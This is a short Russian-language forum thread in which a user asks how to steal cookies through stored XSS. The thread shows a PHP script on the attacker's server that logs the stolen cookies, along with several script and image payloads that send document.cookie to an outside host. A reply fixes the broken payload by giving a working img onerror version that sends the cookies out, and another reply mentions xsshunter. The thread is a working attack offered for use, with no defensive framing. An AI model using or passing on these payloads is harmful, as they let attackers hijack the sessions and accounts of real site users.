с помощью stored xss куки взять.
На сервере лежит файл со следующим содержимым:
<?php
$collectedCookie=$_GET['cookie'];
$file=fopen('stolen_cookie.txt','a');
fwrite($file,"COOKIE:$collectedCookie \n");
fclose($file);
?>
Сама stored xss выглядит вот так:
<script>window.location='https://0webhpp.com/cookiethief.php/?cookie='+document.cookie</script>
В таком случае все ок, куки получаю.
Но этот вариант не устраивает. Попробовал сделать вот так:
<script>document.location='https://0webhpp.com/cookiethief.php/?cookie='+document.cookie</script>
В таком случае куки не получаю.
Если делать вот так:
<img src="https://0webhpp.com/cookiethief.php?cookie='+document.cookie+'" />
То вообще получаю тупо строку document.cookie
Как сделать так, что бы хотя бы при document.location работало?
Да, увидел, а как думаете, что стоит исправить в примере с document.location?
Поэтому нужно делать window.location. А пример с img src так вообще магия какая-то, не будет в html работать конкатенация. Надо делать что-то вроде <img src="x" onerror="this.src = 'https://0webhpp.com/cookiethief.php?cookie='+document.cookie" />
Принял, спасибо!)
Если что - люди придумали xsshunter и тд
Обсуждают сегодня